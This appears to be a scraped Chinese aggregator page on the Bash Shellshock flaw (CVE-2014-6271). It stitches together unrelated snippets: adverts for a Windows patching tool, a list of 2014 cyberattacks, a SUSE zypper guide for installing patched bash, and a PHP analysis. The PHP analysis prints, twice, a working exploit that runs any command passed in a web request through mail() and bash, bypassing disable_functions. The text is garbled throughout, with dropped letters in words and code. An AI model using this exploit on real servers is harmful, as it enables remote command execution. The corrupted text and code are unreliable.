cve

更新时间:2023-02-28 21:43:41 阅读: 评论:0

CVE-2014-6271漏洞怎么修复

使用腾讯电脑管家来修复就可以了- -
重要的危险漏洞是需要修复的,不修复会导致病毒入侵,一些小的漏洞就无所谓了
漏洞修复也可以使用腾讯电脑管家来修复
下载打开腾讯电脑管家,修复漏洞就可以对系统漏洞进行修复扫描了
非常便捷,而且腾讯电脑管家的漏洞全部来自微软官网,可靠安全
腾讯电脑管家还可以删除已修复的漏洞,即是说,如果你的电脑与最新的漏洞相冲突,只要在“已安装”中删除就不会有问题了。

Bash 漏洞 CVE-2014-6271 如何被利用?有何影响

打开腾讯电脑管家——工具箱——修复漏洞,进行漏洞扫描和修复。
建议设置开启自动修复漏洞功能,开启后,电脑管家可以在发现高危漏洞(仅包括高危漏洞,不包括其它漏洞)时,第一时间自动进行修复,无需用户参与,最大程度保证用户电脑安全。尤其适合老人、小孩或计算机初级水平用户使用。开启方式如下:进入电脑管家“修复漏洞”模块—“设置”,点击开启自动修复漏洞即可。

14年全球有哪些网络被攻击的案例

事件一、1•21中国互联网DNS大劫难
2014年1月21日下午3点10分左右,国内通用顶级域的根服务器忽然出现异常,导致众多知名网站出现DNS解析故障,用户无法正常访问。虽然国内访问根服务器很快恢复,但由于DNS缓存问题,部分地区用户“断网”现象仍持续了数个小时,至少有2/3的国内网站受到影响。微博调查显示,“1•21全国DNS大劫难”影响空前。事故发生期间,超过85%的用户遭遇了DNS故障,引发网速变慢和打不开网站的情况。
事件二、比特币交易站受攻击破产
2014年2月,全球最大的比特币交易平台Mt.Gox由于交易系统出现漏洞,75万个比特币以及Mt.Gox自身账号中约10万个比特币被窃,损失估计达到4.67亿美元,被迫宣布破产。这一事件凸显了互联网金融在网络安全威胁面前的脆弱性。
事件三、携程漏洞事件
2014年3月22日,有安全研究人员在第三方漏洞收集平台上报了一个题目为“携程安全支付日志可遍历下载导致大量用户银行卡信息泄露(包含持卡人姓名身份证、银行卡号、卡CVV码、6位卡Bin)”的漏洞。上报材料指出携程安全支付日志可遍历下载,导致大量用户银行卡信息泄露,并称已将细节通知厂商并且等待厂商处理中。一石激起千层浪,该漏洞立即引发了关于“电商网站存储用户信用卡等敏感信息,并存在泄漏风险”等问题的热议。
事件四、XP系统停止服务
微软公司在2014年4月8日后对XP系统停止更新维护的服务。但XP仍然是当今世界被广泛使用的操作系统之一。特别是在中国,仍有63.7%的用户,也就是大约3亿左右的用户还在使用XP系统。因此“后XP时代”的信息安全一直备受关注,但国内安全厂商推出的防护软件究竟效果如何,面对市场上如此多的安全防护软件,选哪个又是一个疑问,所以xp挑战赛应运而生。在2014年4月5日的XP挑战赛中,腾讯、金山落败360坚守成功。
事件五、OpenSSL心脏出血漏洞
2014年4月爆出了Heartbleed漏洞,该漏洞是近年来影响范围最广的高危漏洞,涉及各大网银、门户网站等。该漏洞可被用于窃取服务器敏感信息,实时抓取用户的账号密码。从该漏洞被公开到漏洞被修复的这段时间内,已经有黑客利用OpenSSL漏洞发动了大量攻击,有些网站用户信息或许已经被黑客非法获取。未来一段时间内,黑客可能会利用获取到的这些用户信息,在互联网上再次进行其他形式的恶意攻击,针对用户的“次生危害”(如网络诈骗等)会大量集中显现。即使是在今后十年中,预计仍会在成千上万台服务器上发现这一漏洞,甚至包括一些非常重要的服务器。
事件六、中国快递1400万信息泄露
2014年4月,国内某黑客对国内两个大型物流公司的内部系统发起网络攻击,非法获取快递用户个人信息1400多万条,并出售给不法分子。而有趣的是,该黑客贩卖这些信息仅获利1000元。根据媒体报道,该黑客仅是一名22岁的大学生,正在某大学计算机专业读大学二年级。
事件七、eBay数据的大泄漏
2014年5月22日,eBay要求近1.28亿活跃用户全部重新设置密码,此前这家零售网站透露黑客能从该网站获取密码、电话号码、地址及其他个人数据。该公司表示,黑客网络攻击得手的eBay数据库不包含客户任何财务信息——比如信用卡号码之类的信息。eBay表示该公司会就重设密码一事联系用户以解决这次危机。这次泄密事件发生在今年2月底和3月初,eBay是在5月初才发现这一泄密事件,并未说明有多少用户受到此次事件的影响。
事件八、BadUSB漏洞
2014年8月,在美国黑帽大会上,JakobLell和KarstenNohl公布了BadUSB漏洞。攻击者利用该漏洞将恶意代码存放在USB设备控制器的固件存储区,而不是存放在其它可以通过USB接口进行读取的存储区域。这样,杀毒软件或者普通的格式化操作是清除不掉该代码的,从而使USB设备在接入PC等设备时,可以欺骗PC的操作系统,从而达到某些目的。
事件九、Shellshock漏洞
2014年9月25日,US-CERT公布了一个严重的Bash安全漏洞(CVE-2014 -6271) 。由于Bash是Linux用户广泛使用的一款用于控制命令提示符工具,从而导致该漏洞影响范围甚广。安全专家表示,由于并非所有运行Bash的电脑都存在漏洞,所以受影响的系统数量或许不及“心脏流血”。不过,Shellshock本身的破坏力却更大,因为黑客可以借此完全控制被感染的机器,不仅能破坏数据,甚至会关闭网络,或对网站发起攻击。
事件十、500万谷歌账户信息被泄露
2014年9月,大约有500万谷歌的账户和密码的数据库被泄露给一家俄罗斯互联网网络安全论坛。这些用户大多使用了Gmail邮件服务和美国互联网巨头的其他产品。据俄罗斯一个受欢迎的IT新闻网站CNews报道,论坛用户tvskit声称60%的密码是有效的,一些用户也确认在数据库里发现他们的数据。
事件十一、飓风熊猫本地提权工具
2014年10月,CrowdStrike发现飓风熊猫这个本地提权工具,飓风熊猫是主要针对基础设施公司的先进攻击者。国外专业人士还表示,该攻击代码写的非常好,成功率为100%。我们知道飓风熊猫使用的是“ChinaChopper”Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种密码破解工具获得目标访问的合法凭证。该本地提权工具影响了所有的Windows版本,包括Windows7和WindowsServer 2008 R2 及以下版本。
事件十二、赛门铁克揭秘间谍工具regin
2014年11月24日,赛门铁克发布的一份报告称,该公司发现了一款名为“regin”的先进隐形恶意软件。这是一款先进的间谍软件,被称为史上最为复杂的后门木马恶意软件。该软件被用于监视政府机关、基础设施运营商、企业、研究机构甚至针对个人的间谍活动中。
事件十三、索尼影业公司被黑客攻击
2014年12月,索尼影业公司被黑客攻击。黑客对索尼影业公司发动的这次攻击影响令人感到震惊:摄制计划、明星隐私、未发表的剧本等敏感数据都被黑客窃取,并逐步公布在网络上,甚至包括到索尼影业员工的个人信息。预计索尼影业损失高达1亿美元,仅次于2011年被黑客攻击的损失。
事件十四、12306用户数据泄露含身份证及密码信息
2014年12月25日,乌云漏洞报告平台报告称,大量12306用户数据在互联网疯传,内容包括用户帐号、明文密码、身份证号码、手机号码和电子邮箱等。这次事件是黑客首先通过收集互联网某游戏网站以及其他多个网站泄露的用户名和密码信息,然后通过撞库的方式利用12306的安全机制的缺欠来获取了这13万多条用户数据。同时360互联网安全中心就此呼吁,12306用户尽快修改密码,避免已经订到的火车票被恶意退票。另外如果有其他重要帐号使用了和12306相同的注册邮箱和密码,也应尽快修改密码,以免遭遇盗号风险。

ubuntu有zypper命令吗

zypper源的配置

SUSE的zypper本地源配置起来跟yum的配置很相似,它们的配置文件有很多相似之处。不过,个人觉得zypper这个工具稍微强大些。在SUSE下,可以通过一条zypper的命令,即可完成zypper源的配置。

以下包是SUSE的Bash最新升级包,接下来的操作是把下面的升级包作为一个本地仓库,供以后zypper update来使用,

1
2
3
4
5
6
7
8
9
10

funny:~ # unzip CVE-2014-6271.zip
Archive: CVE-2014-6271.zip
creating: CVE-2014-6271/
inflating: CVE-2014-6271/bash 9740.htm
inflating: CVE-2014-6271/bash-3.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/bash-doc-3.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/libreadline5-32bit-5.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/libreadline5-5.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/licen_agreement.txt
inflating: CVE-2014-6271/readline-doc-5.2-147.20.1.x86_64.rpm

接下来的操作是把这些包放到一个目录里,然后把该目录做成系统的一个更新源。比如,把解压后的目录放到/opt目录下,然后使用zypper ar添加该zypper源。

1
2
3
4
5
6
7
8

funny:~ # mv CVE-2014-6271 /opt/update
funny:~ # zypper ar file:///opt/update update
Adding repository 'update' [done]
Repository 'update' successfully added
Enabled: Yes
Autorefresh: No
GPG check: Yes
URI: file:/opt/update

接下来,使用zypper lr验证下,

1
2
3
4
5

funny:~ # zypper lr
# | Alias | Name | Enabled | Refresh
--+--------+--------+---------+--------
1 | local | local | Yes | Yes
2 | update | update | Yes | No

php executecommand是阻塞的么

PHP Execute Command Bypass Disable_functions
先简单说一下php调用mail()函数的过程。
看到源码ext/mail.c

236行:

Default

char *ndmail_path = INI_STR("ndmail_path");
char *ndmail_cmd = NULL;

char *ndmail_path = INI_STR("ndmail_path");
char *ndmail_cmd = NULL;
从INI中获得ndmail_path变量。我们看看php.ini里是怎么说明的:

Default

; For Unix only. You may supply arguments as well (default: "ndmail -t -i").
;ndmail_path =

; For Unix only. You may supply arguments as well (default: "ndmail -t -i").
;ndmail_path =
注释中可以看到,nd_mail默认值为”ndmail -t -i”.

extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将ndmail_path和extra_cmd组合成真正执行的命令行ndmail_cmd 。不存在则直接将ndmail_path赋值给ndmail_cmd 。
如下:

Default

if (!ndmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
/* handle old style win smtp nding */
if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
if (tsm_errmsg) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
efree(tsm_errmsg);
} el {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
}
MAIL_RET(0);
}
MAIL_RET(1);
#el
MAIL_RET(0);
#endif
}
if (extra_cmd != NULL) {
spprintf(&ndmail_cmd, 0, "%s %s", ndmail_path, extra_cmd);
} el {
ndmail_cmd = ndmail_path;
}
if (!ndmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
/* handle old style win smtp nding */
if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
if (tsm_errmsg) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
efree(tsm_errmsg);
} el {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
}
MAIL_RET(0);
}
MAIL_RET(1);
#el
MAIL_RET(0);
#endif
}
if (extra_cmd != NULL) {
spprintf(&ndmail_cmd, 0, "%s %s", ndmail_path, extra_cmd);
} el {
ndmail_cmd = ndmail_path;
}
之后执行:

Default

#ifdef PHP_WIN32
ndmail = popen_ex(ndmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#el
/* Since popen() doesn't indicate if the internal fork() doesn't work
* (e.g. the shell can't be executed) we explicitly t it to 0 to be
* sure we don't catch any older errno value. */
errno = 0;
ndmail = popen(ndmail_cmd, "w");
#endif
#ifdef PHP_WIN32
ndmail = popen_ex(ndmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#el
/* Since popen() doesn't indicate if the internal fork() doesn't work
* (e.g. the shell can't be executed) we explicitly t it to 0 to be
* sure we don't catch any older errno value. */
errno = 0;
ndmail = popen(ndmail_cmd, "w");
#endif
将ndmail_cmd丢给popen执行。
如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。

影响版本:php 各版本

修复方法:修复CVE-2014-6271

给出POC(http://www.exploit-db.com/exploits/35146/)如下:

Default

<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the ur may only alter environment variableswho names
// begin with the prefixes supplied by this directive.
// By default, urs will only be able to t environment variablesthat
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive impty,
// PHP will let the ur modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallynd any mail
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
el return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>
<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the ur may only alter environment variableswho names
// begin with the prefixes supplied by this directive.
// By default, urs will only be able to t environment variablesthat
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive impty,
// PHP will let the ur modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallynd any mail
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
el return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>
[via@phith0n ]

linux配置源怎么打开使用 zypper install syslog-ng -y

一、zypper源的配置

SUSE的zypper本地源配置起来跟yum的配置很相似,它们的配置文件有很多相似之处。不过,个人觉得zypper这个工具稍微强大些。在SUSE下,可以通过一条zypper的命令,即可完成zypper源的配置。

以下包是SUSE的Bash最新升级包,接下来的操作是把下面的升级包作为一个本地仓库,供以后zypper update来使用,

1
2
3
4
5
6
7
8
9
10

funny:~ # unzip CVE-2014-6271.zip
Archive: CVE-2014-6271.zip
creating: CVE-2014-6271/
inflating: CVE-2014-6271/bash 9740.htm
inflating: CVE-2014-6271/bash-3.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/bash-doc-3.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/libreadline5-32bit-5.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/libreadline5-5.2-147.20.1.x86_64.rpm
inflating: CVE-2014-6271/licen_agreement.txt
inflating: CVE-2014-6271/readline-doc-5.2-147.20.1.x86_64.rpm

接下来的操作是把这些包放到一个目录里,然后把该目录做成系统的一个更新源。比如,把解压后的目录放到/opt目录下,然后使用zypper ar添加该zypper源。

1
2
3
4
5
6
7
8

funny:~ # mv CVE-2014-6271 /opt/update
funny:~ # zypper ar file:///opt/update update
Adding repository 'update' [done]
Repository 'update' successfully added
Enabled: Yes
Autorefresh: No
GPG check: Yes
URI: file:/opt/update

接下来,使用zypper lr验证下,

1
2
3
4
5

funny:~ # zypper lr
# | Alias | Name | Enabled | Refresh
--+--------+--------+---------+--------
1 | local | local | Yes | Yes
2 | update | update | Yes | No

说明我们已成功添加update的源。另外,执行”zypper ar URI alias“后,会在/etc/zypp/repo.d/目录下生成alias.repo配置文件。接下来,我们试试zypper update命令,看是不是可以真的可以升级?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

funny:~ # zypper update
Building repository 'update' cache [done]
Loading repository data...
Reading installed packages...

The following packages are going to be upgraded:
bash bash-doc libreadline5 readline-doc

The following packages are not supported by their vendor:
bash bash-doc libreadline5 readline-doc

4 packages to upgrade.
Overall download size: 923.0 KiB. ...
Continue? [y/n/?] (y): y
Retrieving package libreadline5-5.2-147.20.1.x86_64 (1/4), ...
Retrieving package bash-3.2-147.20.1.x86_64 (2/4), ...
Retrieving package readline-doc-5.2-147.20.1.x86_64 (3/4), ...
Retrieving package bash-doc-3.2-147.20.1.x86_64 (4/4), ...
Retrieving package libreadline5-5.2-147.20.1.x86_64 (1/4), ...
Installing: libreadline5-5.2-147.20.1 [done]
Retrieving package bash-3.2-147.20.1.x86_64 (2/4), ...
Installing: bash-3.2-147.20.1 [done]
Retrieving package readline-doc-5.2-147.20.1.x86_64 (3/4), ...
Installing: readline-doc-5.2-147.20.1 [done]
Retrieving package bash-doc-3.2-147.20.1.x86_64 (4/4), ...
Installing: bash-doc-3.2-147.20.1 [done]

以上说明可以进行升级的。接下来,我们使用zypper ps命令,可以查看有哪些终端还在使用之前没有升级过的bash,

1
2
3
4
5
6
7
8
9
10
11

funny:/etc/zypp/repos.d # zypper ps
The following running process u deleted files:

PID | PPID | UID | Login | Command | Files
------+-------+-----+-------+---------+--------------------------
2663 | 2542 | 0 | root | bash | /lib64/libreadline.so.5.2
| | | | | /bin/bash (deleted)
22426 | 22423 | 0 | root | bash | /lib64/libreadline.so.5.2
| | | | | /bin/bash (deleted)

You may wish to restart the process.

二、zypper命令选项介绍

1. zypper的几个重要选项:

选项
说明
repos, lr
列出库
sl
列出库(目的是与rug兼容)
addrepo, ar 添加库
sa 添加库(目的是与rug兼容)
renamerepo, nr 重命名指定的安装源
modifyrepo, mr 修改指定的安装源
refresh, ref 刷新所有安装源
clean 清除本地缓存

2. zypper软件管理:

选项 说明
install, in
安装软件包
remove, rm 删除软件包
verify, ve 检验软件包依赖关系的完整性
update, up 更新已安装的软件包到新的版本
dist-upgrade, dup
整个系统的升级
source-install, si 安装源代码软件包和它们的编译依赖

3. zypper的查询选项:

选项
说明
arch, 安装软件包
packages, pa
列出所有可用的软件包
patterns, pt 列出所有可用的模式
products, pd 列出所有可用的产品
what-provides, wp 列出能够提供指定功能的软件包

本文发布于:2023-02-28 18:58:00,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/zhishi/a/167759182148520.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:cve.doc

本文 PDF 下载地址:cve.pdf

标签:cve
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 实用文体写作网旗下知识大全大全栏目是一个全百科类宝库! 优秀范文|法律文书|专利查询|